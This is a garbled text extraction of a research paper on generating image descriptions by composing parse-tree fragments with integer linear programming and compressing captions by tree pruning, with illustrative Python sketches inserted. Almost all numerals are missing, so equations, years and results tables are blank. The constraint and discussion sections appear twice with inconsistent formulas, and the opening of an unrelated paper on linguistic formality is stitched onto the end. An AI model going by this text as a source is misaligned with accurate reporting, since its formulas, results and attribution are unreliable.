tree congruence constraints: to ensure that each cky cell has at most one symbol, we require ∀ i, j: ∑s∈nt βijs ≤ 1. we also require that ∀ i, j > i, h: βijh = ∑k=i..j−1 ∑r∈rh βijkr, where rh = {r ∈ r : r = h → pq}. we enforce these constraints only for non-leaf cells; this forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a corresponding pcfg rule. we also ensure that we produce a valid tree structure; for instance, if we select phrases as shown in figure , we must have the root of the tree at the corresponding cell: ∀ k ∈ [0, n): ∑s∈nt βkks ≤ ∑t=k..n−1 ∑s∈nt β0ts. we also require cells that are not selected for the resulting parse structure to be empty: ∀ i, j: ∑k γijk ≤ 1. additionally, we penalize solutions without the s tag at the parse root as a soft constraint.
miscellaneous constraints: finally, we include several constraints to avoid degenerate solutions or otherwise to enhance the composed output: (1) enforce that a noun phrase is selected (to ensure semantic relevance to the image content), (2) allow at most one phrase of each type, (3) do not allow multiple phrases with identical headwords (to avoid redundancy), and (4) allow at most one scene phrase for all sentences in the description. we find that handling of sentence boundaries is important if the ilp formulation is based only on sequence structure, but with the integration of tree-based structure, we need not handle sentence boundaries.
discussion
an interesting aspect of description generation explored in this paper is that the building blocks of composition are tree fragments, rather than individual words. there are three practical benefits: (1) syntactic and semantic expressiveness, (2) correctness, and (3) computational efficiency. because we extract nice segments from human-written captions, we are able to use expressive language, and are less likely to make syntactic or semantic errors. our phrase extraction process can be viewed at a high level as visually-grounded or visually-situated paraphrasing. also, because the unit of operation is tree fragments, the ilp formulation encoded in this work is computationally lightweight. if the unit of composition were words, the ilp instances would be significantly more computationally intensive, and more likely to suffer from grammatical and semantic errors.
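to give a sense of how such a formulation looks in practice, the toy sketch below encodes only the sequence side of the model (the αik selection/ordering variables, the αijk adjacency variables with the conjunction constraints above, and the one-phrase-per-type and noun-phrase requirements) using the open-source pulp modeler. it is a simplified stand-in written by us, not the authors' cplex formulation: the tree-side β and γ variables, the pcfg rule constraints, and the real scoring functions fi, fij, and fr are omitted, and the scores below are placeholders.

```python
from pulp import LpProblem, LpMaximize, LpVariable, lpSum, LpBinary

# toy candidate phrases: id -> (phrase type, placeholder selection score f_i)
phrases = {0: ("object", 2.0), 1: ("action", 1.5), 2: ("scene", 1.0), 3: ("object", 0.5)}
def pair_score(i, j):          # placeholder for the cohesion score f_ij
    return 0.1
N = 3                          # number of sentence positions in this toy example

prob = LpProblem("tree_composition_sketch", LpMaximize)
# alpha[i][k] = 1 iff phrase i is placed at position k
alpha = LpVariable.dicts("alpha", (list(phrases), range(N)), cat=LpBinary)
# alpha2[(i, j, k)] = 1 iff phrase i is at position k and phrase j at position k + 1
pairs = [(i, j, k) for i in phrases for j in phrases if j != i for k in range(N - 1)]
alpha2 = LpVariable.dicts("alpha2", pairs, cat=LpBinary)

# objective: selection scores plus adjacency (cohesion) scores
prob += (lpSum(phrases[i][1] * alpha[i][k] for i in phrases for k in range(N))
         + lpSum(pair_score(i, j) * alpha2[(i, j, k)] for (i, j, k) in pairs))

for k in range(N):             # at most one phrase per position
    prob += lpSum(alpha[i][k] for i in phrases) <= 1
for i in phrases:              # each phrase used at most once
    prob += lpSum(alpha[i][k] for k in range(N)) <= 1
for t in {t for t, _ in phrases.values()}:   # at most one phrase of each type
    prob += lpSum(alpha[i][k] for i in phrases if phrases[i][0] == t for k in range(N)) <= 1
# require that at least one noun phrase ("object") is selected
prob += lpSum(alpha[i][k] for i in phrases if phrases[i][0] == "object" for k in range(N)) >= 1
for (i, j, k) in pairs:        # conjunction constraints linking alpha2 to alpha (as above)
    prob += alpha2[(i, j, k)] <= alpha[i][k]
    prob += alpha2[(i, j, k)] <= alpha[j][k + 1]
    prob += alpha2[(i, j, k)] >= alpha[i][k] + alpha[j][k + 1] - 1

prob.solve()
selected = sorted((k, i) for i in phrases for k in range(N) if alpha[i][k].value() == 1)
print([phrases[i][0] for _, i in selected])  # phrase types in their chosen order
```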
figure : cky-style representation of the decision variables defined in § for the tree example in fig. . nonterminal symbols in boldface (in blue) and solid arrows (also in blue) represent the chosen pcfg rules that combine the selected set of phrases; nonterminal symbols in smaller font (in red) and dotted arrows (also in red) represent possible other choices that are not selected.

the ilp objective, a weighted sum over selected phrases, adjacent phrase pairs, and pcfg rules, is comprised of three types of weights (confidence scores): fi, fij, and fr. fi represents the phrase selection score based on visual similarity, described in § .
fij quantifies the sequence cohesion across phrase boundaries. for this, we use n-gram scores (n ∈ [ , ]) between adjacent phrases computed using the google web 1t corpus (brants and franz). finally, fr quantifies pcfg rule scores (log probabilities) estimated from the 1m image caption corpus (ordonez et al.) parsed using the stanford parser (klein and manning). one can view fi as a content selection score, while fij and fr correspond to linguistic fluency scores capturing sequence and tree structure respectively. (all weights are normalized using a z-score.) if we set positive values for all of these weights, the optimization function would be biased toward verbose production, since selecting an additional phrase will increase the objective function. to control for verbosity, we set the scores corresponding to linguistic fluency, i.e., fij and fr, to negative values (smaller absolute values for higher fluency), to balance the dynamics between content selection and linguistic fluency.

ilp constraints

soundness constraints: we need constraints to enforce consistency between the different types of variables (equations ( ), ( ), ( )). constraints for a product of two variables have been discussed by clarke and lapata. for equation ( ), we add the following constraints (similar constraints are also added for equations ( ) and ( )):

∀ijk: αijk ≤ αik,  αijk ≤ αj(k+1),  αijk + (1 − αik) + (1 − αj(k+1)) ≥ 1 ( )

consistency between tree leaves and sequences: the ordering of phrases implied by αijk must be consistent with the ordering of phrases implied by the β variables. this can be achieved by aligning the leaf cells (i.e., βkks) in the cky-style matrix with the α variables as follows:

∀ik: αik ≤ Σ_{s∈NTi} βkks ( )
∀k: Σ_i αik = Σ_{s∈NT} βkks ( )

where NTi refers to the set of pcfg nonterminals that are compatible with the phrase type pt(i) of pi. for example, NTi = {nn, np, ...} if pi corresponds to an "object" (noun phrase). thus, the first of these equations enforces the correspondence between phrase types and nonterminal symbols at the tree leaves, and the second enforces the constraint that the number of selected phrases and the number of instantiated tree leaves must be the same.

tree congruence constraints: to ensure that each cky cell has at most one symbol, we require

∀ij: Σ_{s∈NT} βijs ≤ 1 ( )

we also require that

∀i, j>i, h: βijh = Σ_{k=i}^{j−1} Σ_{r∈Rh} γijkr ( )

where Rh = {r ∈ R : r = h → pq}. we enforce these constraints only for non-leaves. this constraint forbids instantiations where a nonterminal symbol h is selected for cell ij without selecting a corresponding pcfg rule.

we also ensure that we produce a valid tree structure. for instance, if we select phrases as shown in figure , we must have the root of the tree at the corresponding cell:

∀k ∈ [ , n): Σ_{s∈NT} βkks ≤ Σ_{t=k}^{n−1} Σ_{s∈NT} βts ( )

we also require cells that are not selected for the resulting parse structure to be empty:

∀ij: Σ_k γijk ≤ ( )

additionally, we penalize solutions without the s tag at the parse root as a soft constraint.

miscellaneous constraints: finally, we include several constraints to avoid degenerate solutions or to otherwise enhance the composed output. we (1) enforce that a noun phrase is selected (to ensure semantic relevance to the image content), (2) allow at most one phrase of each type, (3) do not allow multiple phrases with identical headwords (to avoid redundancy), and (4) allow at most one scene phrase for all sentences in the description. we find that handling of sentence boundaries is important if the ilp formulation is based only on sequence structure, but with the integration of the tree-based structure we do not need to handle sentence boundaries specifically.
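the soundness constraints above are the standard linearisation of a product of two binary variables. as a rough illustration (again with pulp and toy index sets, not the authors' code), the three constraints for one pair variable could be written as follows.

```python
# a minimal sketch (toy sizes) of linearising pair = alpha1 * alpha2 for binary
# variables: pair <= alpha1, pair <= alpha2, pair + (1-alpha1) + (1-alpha2) >= 1.
import pulp

n = 3
prob = pulp.LpProblem("soundness", pulp.LpMaximize)
alpha = pulp.LpVariable.dicts("alpha", (range(n), range(n)), cat=pulp.LpBinary)
pair = pulp.LpVariable.dicts("pair", (range(n), range(n), range(n - 1)),
                             cat=pulp.LpBinary)

for i in range(n):
    for j in range(n):
        for k in range(n - 1):
            # pair[i][j][k] says: phrase i sits at position k and phrase j at k+1
            prob += pair[i][j][k] <= alpha[i][k]
            prob += pair[i][j][k] <= alpha[j][k + 1]
            prob += pair[i][j][k] + (1 - alpha[i][k]) + (1 - alpha[j][k + 1]) >= 1
```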
discussion

an interesting aspect of description generation explored in this paper is that the building blocks of composition are tree fragments rather than individual words. there are three practical benefits: (1) syntactic and semantic expressiveness, (2) correctness, and (3) computational efficiency. because we extract phrases from human-written captions, we are able to use expressive language, and we are less likely to make syntactic or semantic errors. our phrase extraction process can be viewed at a high level as visually grounded, or visually situated, paraphrasing. also, because the unit of operation is tree fragments, the ilp formulation encoded in this work is computationally lightweight. if the unit of composition were words, the ilp instances would be significantly more computationally intensive, and more likely to suffer from grammatical and semantic errors.

tree compression

as noted by recent studies (mason and charniak; kuznetsova et al.; jamieson et al.), naturally existing image captions often include contextual information that does not directly describe visual content, which ultimately hinders their usefulness for describing other images. therefore, to improve the fidelity of the generated descriptions, we explore image caption generalization as an optional pre-processing step.

figure : compressed captions (on the left) are more applicable for describing new images (on the right).

figure illustrates a concrete example of image caption generalization in the context of image caption generation. we cast caption generalization as sentence compression. we encode the problem as tree pruning via lightweight cky parsing, while also incorporating several other considerations such as leaf-level ngram cohesion scores and visually informed content selection. figure shows an example compression, and figure shows the corresponding cky matrix.

at a high level, the compression operation resembles bottom-up cky parsing, but in addition to parsing, we also consider deletion of parts of the trees. when deleting parts of the original tree, we might need to re-parse the remainder of the tree. note that we consider re-parsing only with respect to the original parse tree produced by a state-of-the-art parser, hence it is only a lightweight parsing.

dynamic programming

the input to the algorithm is a sentence, represented as a vector x = x0 ... xn−1 = x[0 : n−1], and its pcfg parse π(x) obtained from the stanford parser. (integrating full parsing into the original sentence would be a straightforward extension conceptually, but may not be an empirically better choice when parsing for compression is based on vanilla unlexicalized parsing.) for simplicity of notation, we assume that both the parse tree and the word sequence are encoded in x. then, the compression can be formalized as:
ŷ = argmax_y ∏_i φi(x, y) ( )

where each φi is a potential function corresponding to a criterion of the desired compression:

φi(x, y) = exp(θi · fi(x, y)) ( )

where θi is the weight for a particular criterion (described in § ), whose scoring function is fi. we solve the decoding problem using dynamic programming. for this, we need to solve the compression sub-problems for sequences x[i : j], which can be viewed as branches ŷ[i, j] of the final tree ŷ[0 : n−1]. for example, in figure , the final solution is ŷ[0 : ], while a sub-solution of x[ : ] corresponds to a tree branch pp. notice that sub-solution ŷ[ : ] represents the same branch as ŷ[ : ] due to branch deletion. some computed sub-solutions, e.g., ŷ[ : ], get dropped from the final compressed tree.

we define a matrix of scores d[i, j, h], where h is one of the nonterminal symbols being considered for the cell indexed by i, j, i.e., a candidate for the root symbol of a branch ŷ[i : j]. when all values d[i, j, h] are computed, we take

ĥ = argmax_h d[0, n−1, h] ( )

and backtrack to reconstruct the final compression (the exact solution to the decoding problem). the recurrence is

d[i, j, h] = max over k ∈ [i, j) and r ∈ Rh of:
(1) d[i, k, p] + d[k+1, j, q] + ∆φ[r, ij]
(2) d[i, k, p] + ∆φ[r, ij]
(3) d[k+1, j, p] + ∆φ[r, ij] ( )

where Rh = {r ∈ R : r = h → pq ∨ r = h → p}. index k determines a split point for the child branches of a subtree ŷ[i : j]. for example, in figure the split point for the children of the subtree ŷ[ : ] is k = . the three cases ((1)–(3)) of the above equation correspond to the following tree pruning cases:

pruning case (1): none of the children of the current node is deleted. for example, in figures and , the pcfg rule pp → in pp, corresponding to the sequence "in black and white", is retained. another situation that can be encountered is tree re-parsing.

figure : cky compression. both the chosen rules and phrases (blue bold font and blue solid arrows) and the rules and phrases that are not chosen (red italic smaller font and red dashed lines) are shown.

pruning case (2)/(3): deletion of the left/right child, respectively. there are two types of deletion, as illustrated in figures and . the first corresponds to deletion of a child node; for example, the second child nn of the rule np → np nn is deleted, which yields deletion of "shot". the second type is a special case of propagating a node to a higher level of the tree. in figure , this situation occurs when deleting the jj "vintage", which causes the propagation of nn from one cell to a higher cell. for this purpose, we expand the set of rules R with additional special rules of the form h → h, e.g., nn → nn, which allows propagation of tree nodes to higher levels of the compressed tree.
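a rough sketch of this bottom-up recurrence is given below. the grammar, scores, and the ∆φ function are toy placeholders, the special propagation rules h → h are omitted, and the comments label the cases only by which branch survives, so this is an illustration of the recurrence rather than the authors' implementation.

```python
# a minimal sketch (toy grammar and scores) of the compression recurrence
# d[i, j, h]: for every span (i, j), split point k, and rule h -> p q we keep
# either both child branches or only one of them, whichever scores best.
from collections import defaultdict

def compress(n, binary_rules, leaf_scores, delta_phi):
    """n: sentence length; binary_rules: {h: [(p, q), ...]};
    leaf_scores: {(k, tag): score}; delta_phi(rule, i, j) -> float."""
    D = defaultdict(lambda: float("-inf"))
    back = {}
    for (k, tag), score in leaf_scores.items():          # leaf cells
        D[k, k, tag] = score

    for span in range(2, n + 1):                         # bottom-up over spans
        for i in range(n - span + 1):
            j = i + span - 1
            for k in range(i, j):                        # split point
                for h, children in binary_rules.items():
                    for p, q in children:
                        rule = (h, p, q)
                        gain = delta_phi(rule, i, j)
                        candidates = [
                            (D[i, k, p] + D[k + 1, j, q] + gain, "keep both"),
                            (D[i, k, p] + gain, "right branch deleted"),
                            (D[k + 1, j, q] + gain, "left branch deleted"),
                        ]
                        for score, case in candidates:
                            if score > D[i, j, h]:
                                D[i, j, h] = score
                                back[i, j, h] = (k, rule, case)
    root = max(binary_rules, key=lambda h: D[0, n - 1, h])
    return root, D, back
```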
modeling compression criteria

the ∆φ term in the recurrence denotes the sum of the logs of the potential functions for each criterion q:

∆φ[r, ij] = Σ_q θq · ∆fq(r, ij) ( )

(we use ∆ to distinguish the potential value for the whole sentence from the gain of the potential during a single step of the algorithm.) note that ∆φ depends on the current rule r, along with the historical information before the current step ij, such as the original rule rij and the ngrams on the border between the left and right child branches of rule rij. we use the following four criteria fq in our model, which are demonstrated in figures and .

figure : cky compression. both the chosen rules and phrases (blue bold font and blue solid arrows) and the rules and phrases that are not chosen (red italic smaller font and red dashed lines) are shown.

i. tree structure: we capture pcfg rule probabilities estimated from the corpus as ∆fpcfg = log ppcfg(r). we assign the probabilities of the special propagation rules such that they do not affect the final parse tree score; turner and charniak handled propagation cases similarly.

ii. sequence structure: we incorporate ngram cohesion scores only across the border between the two branches of a subtree.

iii. branch deletion probabilities: we compute probabilities of deletion for children as

∆fdel = log p(rt | rij) = log count(rt, rij) / count(rij) ( )

where count(rt, rij) is the frequency with which rij is transformed to rt by deletion of one of the children. we estimate this probability from a training corpus, described in § . count(rij) is the count of rij in uncompressed sentences.

iv. vision detection (content selection): we want to keep words referring to actual objects in the image. thus, we use v(xj), a visual similarity score, as our confidence of an object corresponding to word xj. this similarity is obtained from the visual recognition predictions of deng et al. (note that some test instances include rules that we have not observed during training; we default to the original caption in those cases.)

the weights θi are set using a tuning dataset. we control over-compression by setting the weight for fdel to a small value relative to the other weights.
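the deletion probabilities in criterion iii are simple relative frequencies. the sketch below (with an assumed data format, not the paper's code) shows one way such counts could be accumulated from aligned original/compressed rule pairs.

```python
# a minimal sketch (assumed data format) of estimating branch-deletion
# probabilities: delta_f_del = log count(r_t, r_ij) / count(r_ij).
import math
from collections import Counter

def deletion_log_probs(aligned_rules):
    """aligned_rules: iterable of (original_rule, compressed_rule) pairs harvested
    by aligning original and human-compressed captions; compressed_rule is None
    when the node survived unchanged."""
    joint = Counter()     # count(r_t, r_ij): original rule rewritten as r_t
    marginal = Counter()  # count(r_ij): original rule seen in uncompressed data

    for orig, compressed in aligned_rules:
        marginal[orig] += 1
        if compressed is not None and compressed != orig:
            joint[orig, compressed] += 1

    return {(orig, comp): math.log(c / marginal[orig])
            for (orig, comp), c in joint.items()}

# usage on toy data: NP -> NP NN compressed to NP -> NP (the NN child deleted)
pairs = [(("NP", "NP", "NN"), ("NP", "NP")),
         (("NP", "NP", "NN"), None)]
print(deletion_log_probs(pairs))
```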
human compressed captions

although we model image caption generalization as sentence compression, in practical applications we may want the outputs of these two tasks to be different. for example, there may be differences in what should be deleted (named entities in newswire summaries could be important to keep, while they may be extraneous for image caption generalization). to learn the syntactic patterns for caption generalization, we collect a small set of example compressed captions ( in total) using amazon mechanical turk (amt) (snow et al.). for each image, we asked turkers to first list all visible objects in the image and then to write a compressed caption by removing the bits of text that are not visually verifiable.

figure : caption generalization: good and bad examples (panels: relevance problem; grammar mistakes).

we then align the original and compressed captions to measure rule deletion probabilities, excluding misalignments, similar to knight and marcu. note that we remove this dataset from the 1m caption corpus when we perform description generation.

experiments

we use the 1m captioned image corpus of ordonez et al. we reserve k images as a test set, and use the rest of the corpus for phrase extraction. we experiment with the following approaches.

proposed approaches:
• treepruning: our tree compression approach as described in § .
• seq+tree: our tree composition approach as described in § .
• seq+tree+pruning: seq+tree using the compressed captions of treepruning as building blocks.

baselines for composition:
• seq+lingrule: the closest equivalent to the older sequence-driven system (kuznetsova et al.); it uses a few minor enhancements, such as sentence-boundary statistics, to improve grammaticality.
• seq: the system of § without tree models and without the mentioned enhancements of seq+lingrule.
• seq+pruning: seq using the compressed captions of treepruning as building blocks.

we also experiment with the compression of human-written captions, which are used to generate image descriptions for the new target images.

baselines for compression:
• seqcompression (kuznetsova et al.): inference operates over the sequence structure. although optimization is subject to constraints derived from the dependency parse, parsing is not an explicit part of the inference structure. example outputs are shown in figure .

automatic evaluation

we perform automatic evaluation using two measures widely used in machine translation: bleu (papineni et al.) and meteor (denkowski and lavie). we remove all punctuation and convert captions to lower case. we use the k test images from the captioned image corpus, and assume the original captions as the gold-standard captions to compare against (except for those for which image urls are broken, or cplex did not return a solution). we use the unigram nist implementation of bleu (ftp://jaguar.ncsl.nist.gov/mt/resources/mteval-v a- .tar.gz), with equal weight between precision and recall in table .

table : automatic evaluation. rows: seq+lingrule, seq, seq+tree, seq+pruning, seq+tree+pruning; columns: bleu with (and without) the brevity penalty, and meteor precision, recall, and score.

the results in table show that both the integration of the tree structure (+tree) and the generalization of captions using tree compression (+pruning) improve the bleu score without brevity penalty significantly, while improving meteor only moderately (due to an improvement in precision with a decrease in recall).
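for readers who want a comparable sentence-level score, the snippet below uses nltk's bleu implementation rather than the nist mteval script cited above, so the numbers will not match the paper's; the caption pair is the butterfly example discussed in the human evaluation below.

```python
# a minimal sketch (nltk, not the nist mteval script used in the paper) of a
# unigram, sentence-level bleu score between a system caption and the original.
from nltk.translate.bleu_score import sentence_bleu, SmoothingFunction

reference = "the butterflies are attracted to the colourful flowers in hope gardens".split()
hypothesis = "the butterflies are attracted to the colourful flowers".split()

score = sentence_bleu([reference], hypothesis,
                      weights=(1.0,),                       # unigram bleu
                      smoothing_function=SmoothingFunction().method1)
print(round(score, 3))
```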
human evaluation

neither bleu nor meteor directly measures grammatical correctness over long distances, and they may not correspond perfectly to human judgments. (while bleu with the brevity penalty has been found to correlate better with human judges in recent studies (elliott and keller), we found that this is not the case for our task; this may be due to differences in the gold-standard captions, as we use naturally existing ones, which include a wider range of content and style than crowd-sourced captions.) therefore, we supplement automatic evaluation with human evaluation. for human evaluations, we present two options generated from two competing systems, and ask turkers to choose the one that is better with respect to relevance, grammar, and overall quality. results are shown in table , with multiple turker ratings per image. we filter out turkers based on a control question. we then compute the selection rate (%) of preferring method-1 over method-2. the agreement among turkers is a frequent concern; therefore, we vary the set of dependable users based on their cohen's kappa score (κ) against other users. it turns out that filtering users based on κ does not make a big difference in determining the winning method.

table : human evaluation, posed as a binary question ("which of the two options is better?") with respect to relevance (rel), grammar (gmar), and overall (all). selection rates of method-1 over method-2 are reported for all turkers and for turkers filtered by κ, for comparisons among seq, seq+lingrule, seq+tree, seq+pruning, seq+tree+pruning, and the human captions (image description generation), and between treepruning and seqcompression (image caption generalization). according to pearson's χ² test, all results are statistically significant.

as expected, tree-based systems significantly outperform sequence-based counterparts. for example, seq+tree is strongly preferred over seq, with a selection rate of %. somewhat surprisingly, improved grammaticality also seems to improve relevance scores ( %), possibly because it is harder to appreciate the semantic relevance of automatic captions when they are less comprehensible. also as expected, compositions based on pruned tree fragments significantly improve relevance ( – %), while slightly deteriorating grammar ( – %). notably, the captions generated by our system are preferred over the original (owner-generated) captions – % of the time. one such example is included in figure : "the butterflies are attracted to the colorful flowers."

figure : an example of a description preferred over the human gold standard; the image description is improved due to caption generalization.

additional examples (good and bad) are provided in figures and . many of these captions are highly expressive while remaining semantically
plausible, thanks to the expressive, but somewhat predictable, descriptions that online users write about their photos.

figure : description generation: good examples (panels: highly expressive; poetic; interesting choice of verb phrases; informative). descriptions preferred over the human gold standard are highlighted.

figure : description generation: bad examples (panels: semantic dissonance due to generalization error; extraneous information; vision detection error; completely wrong; grammar problems; literally not relevant, but metaphorically creative).

even among the bad examples (figure ) one can find highly creative captions with not literal but metaphorical relevance: "monarch in her bedroom before the wedding ceremony" ("monarch" can be a type of butterfly). the complete system captions and the original captions are available at http://ilp-cky.appspot.com/.

related work

sentence fusion. sentence fusion has been studied mostly for multi-document summarization (barzilay and mckeown), where redundancy across multiple sentences serves as a guideline for the syntactic and semantic validity of generation. in contrast, we do not have such natural redundancy to rely upon in our task, which requires the composition algorithm to be intrinsically better constrained toward correct sentence structures.

sentence compression. at the core of the image caption generalization task is sentence compression. much work has considered deletion-only edits like ours (knight and marcu; turner and charniak; cohn and lapata; filippova and altun), while more recent work explores more complex edits, such as substitutions, insertions and reordering (cohn and lapata). the latter generally requires a larger training corpus. we leave more expressive compression as future research work.

conclusion

in this paper, we have presented a novel tree composition approach for generating expressive image descriptions. as an optional preprocessing step, we also presented a tree compression approach and reported the empirical benefit of using automatically compressed captions to improve image description generation. by integrating both the tree structure and the sequence structure, we have significantly improved the quality of composed image captions over several competitive baselines.

references

regina barzilay and kathleen mckeown. sentence fusion for multidocument news summarization. computational linguistics.

tamara l. berg, alexander c. berg, and jonathan shih. automatic attribute discovery and characterization from noisy web data. in proceedings of the european conference on computer vision (eccv), berlin, heidelberg. springer-verlag.

thorsten brants and alex franz. web 1t 5-gram version 1. linguistic data consortium.
james clarke and mirella lapata. . global infer- ence for sentence compression an integer linear pro- gramming approach. journal of artificial intelligence research, : – . trevor cohn and mirella lapata. . large margin synchronous generation and its application to sentence compression. in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing (emnlp-conll), pages – , prague, czech republic, june. association for computational lin- guistics. trevor cohn and mirella lapata. . sentence com- pression beyond word deletion. in proceedings of the nd international conference on computational lin- guistics (coling ), pages – , manchester, uk, august. coling organizing committee. navneet dalal and bill triggs. . histograms of ori- ented gradients for human detection. in proceedings of the ieee computer society conference on computer vision and pattern recognition (cvpr’ ) - volume - volume , cvpr ’ , pages – , washington, dc, usa. ieee computer society. jia deng, alexander c. berg, kai li, and fei-fei li. . what does classifying more than , image categories tell us? in eccv. jia deng, alexander c. berg, sanjeev satheesh, hao su, aditya khosla, and fei-fei li. a. large scale visual recognition challenge. in http://www.image- net.org/challenges/lsvrc/ /index. jia deng, jonathan krause, alexander c. berg, and l. fei-fei. b. hedging your bets: optimiz- ing accuracy-specificity trade-offs in large scale visual recognition. in conference on computer vision and pattern recognition. michael denkowski and alon lavie. . meteor . : automatic metric for reliable optimization and eval- uation of machine translation systems. in proceed- ings of the emnlp workshop on statistical ma- chine translation. jesse dodge, amit goyal, xufeng han, alyssa men- sch, margaret mitchell, karl stratos, kota yamaguchi, yejin choi, hal daume iii, alexander c. berg, and tamara l. berg. . detecting visual text. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , montréal, canada, june. association for compu- tational linguistics. desmond elliott and frank keller. . image de- scription using visual dependency representations. in emnlp, pages – . desmond elliott and frank keller. . comparing automatic evaluation measures for image description. in acl ( ), pages – . ali farhadi, mohsen hejrati, mohammad amin sadeghi, peter young , cyrus rashtchian, julia hockenmaier, and david forsyth. . every picture tells a story: generating sentences for images. in european confer- ence on computer vision. pedro f. felzenszwalb, ross b. girshick, david mcallester, and deva ramanan. . object detec- tion with discriminatively trained part based models. ieee transactions on pattern analysis and machine intelligence, ( ): – . yansong feng and mirella lapata. . automatic caption generation for news images. ieee transac- tions on pattern analysis and machine intelligence, ( ): – . katja filippova and yasemin altun. . overcoming the lack of parallel data in sentence compression. in emnlp, pages – . ilog, inc. . ilog cplex: high-performance software for mathematical programming and optimiza- tion. see http://www.ilog.com/products/ cplex/. michael jamieson, afsaneh fazly, suzanne stevenson, sven j. dickinson, and sven wachsmuth. . us- ing language to learn structured appearance models for image annotation. ieee trans. pattern anal. mach. intell., ( ): – . 
dan klein and christopher d. manning. . accurate unlexicalized parsing. in proceedings of the st an- nual meeting on association for computational lin- guistics, pages – . association for computa- tional linguistics. kevin knight and daniel marcu. . statistics-based summarization - step one: sentence compression. in aaai/iaai, pages – . atsuhiro kojima, takeshi tamura, and kunio fukunaga. . natural language description of human activi- ties from video images based on concept hierarchy of actions. ijcv, . niveda krishnamoorthy, girish malkarnenkar, ray- mond j. mooney, kate saenko, and sergio guadar- rama. . generating natural-language video de- scriptions using text-mined knowledge. in aaai. alex krizhevsky, ilya sutskever, and geoffrey hinton. . imagenet classification with deep convolutional neural networks. in nips. girish kulkarni, visruth premraj, sagnik dhar, siming li, yejin choi, alexander c. berg, and tamara l. berg. . babytalk: understanding and generat- ing simple image descriptions. in conference on com- puter vision and pattern recognition. polina kuznetsova, vicente ordonez, alexander c. berg, tamara l. berg, and yejin choi. . collective generation of natural image descriptions. in proceed- ings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , jeju island, korea, july. association for computational linguistics. polina kuznetsova, vicente ordonez, alexander c. berg, tamara l. berg, and yejin choi. . generaliz- ing image captions for image-text parallel corpus. in the st annual meeting of the association for com- putational linguistics - short papers, sofia, bulgaria, august. association for computational linguistics. thomas k. leung and jitendra malik. . recog- nizing surfaces using three-dimensional textons. in iccv, pages – . siming li, girish kulkarni, tamara l. berg, alexan- der c. berg, and yejin choi. . composing sim- ple image descriptions using web-scale n-grams. in proceedings of the fifteenth conference on compu- tational natural language learning, pages – , portland, oregon, usa, june. association for compu- tational linguistics. david g. lowe. . distinctive image features from scale-invariant keypoints. int. j. comput. vision, : – , november. rebecca mason and eugene charniak. . annota- tion of online shopping images without labeled train- ing examples. in proceedings of workshop on vision and language, atlanta, georgia, june. association for computational linguistics. rebecca mason. . domain-independent caption- ing of domain-specific images. in proceedings of the naacl hlt student research workshop, pages – , atlanta, georgia, june. association for com- putational linguistics. margaret mitchell, jesse dodge, amit goyal, kota ya- maguchi, karl stratos, xufeng han, alyssa mensch, alexander c. berg, tamara l. berg, and hal daumé iii. . midge: generating image descriptions from computer vision detections. in eacl, pages – . vicente ordonez, girish kulkarni, and tamara l. berg. . im text: describing images using million captioned photographs. in neural information pro- cessing systems (nips). kishore papineni, salim roukos, todd ward, and wei jing zhu. . bleu: a method for automatic evalua- tion of machine translation. in acl. florent perronnin, zeynep akata, zaid harchaoui, and cordelia schmid. . towards good practice in large-scale learning for image classification. in cvpr. dan roth and wen tau yih. . a linear programming formulation for global inference in natural language tasks. in proc. 
of the annual conference on computa- tional natural language learning (conll). rion snow, brendan o’connor, daniel jurafsky, and andrew y. ng. . cheap and fast—but is it good?: evaluating non-expert annotations for natural language tasks. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. richard socher, andrej karpathy, quoc v. le, christo- pher d. manning, and andrew y. ng. . grounded compositional semantics for finding and de- scribing images with sentences. in transactions of the association for computational linguistics, pages – , april. jenine turner and eugene charniak. . supervised and unsupervised learning for sentence compression. in proceedings of the rd annual meeting of the association for computational linguistics (acl’ ), pages – , ann arbor, michigan, june. associa- tion for computational linguistics. jianxiong xiao, james hays, krista a. ehinger, aude oliva, and antonio torralba. . sun database: large-scale scene recognition from abbey to zoo. in cvpr. yezhou yang, ching teo, hal daume iii, and yiannis aloimonos. . corpus-guided sentence genera- tion of natural images. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , edinburgh, scot- land, uk., july. association for computational lin- guistics. benjamin z. yao, xiong yang, liang lin, mun wai lee, and song-chun zhu. . i t: image parsing to text description. proc. ieee, ( ). haonan yu and jeffrey mark siskind. . grounded language learning from video described with sen- tences. in proceedings of the st annual meeting of the association for computational linguistics (vol- ume : long papers), pages – , sofia, bulgaria, august. association for computational linguistics. an empirical analysis of formality in online communication ellie pavlick university of pennsylvania∗ epavlick@seas.upenn.edu joel tetreault yahoo labs tetreaul@yahoo-inc.com abstract this paper presents an empirical study of linguistic formality. we perform an analy- sis of humans’ perceptions of formality in four different genres. these findings are used to develop a statistical model for pre- dicting formality, which is evaluated un- der different feature settings and genres. we apply our model to an investigation of formality in online discussion forums, and present findings consistent with theories of formality and linguistic coordination. introduction language consists of much more than just con- tent. consider the following two sentences: . those recommendations were unsolicited and undesirable. . that’s the stupidest suggestion ever. both sentences communicate the same idea, but the first is substantially more formal. such stylistic differences often have a larger impact on how the hearer understands the sentence than the literal meaning does (hovy, ). full natural language understanding requires comprehending this stylistic aspect of meaning. to enable real advancements in dialog systems, information extraction, and human-computer interaction, computers need to understand the entirety of what humans say, both the literal and the non-literal. in this paper, we focus on the ∗ research performed while at yahoo labs. particular stylistic dimension illustrated above: formality. 
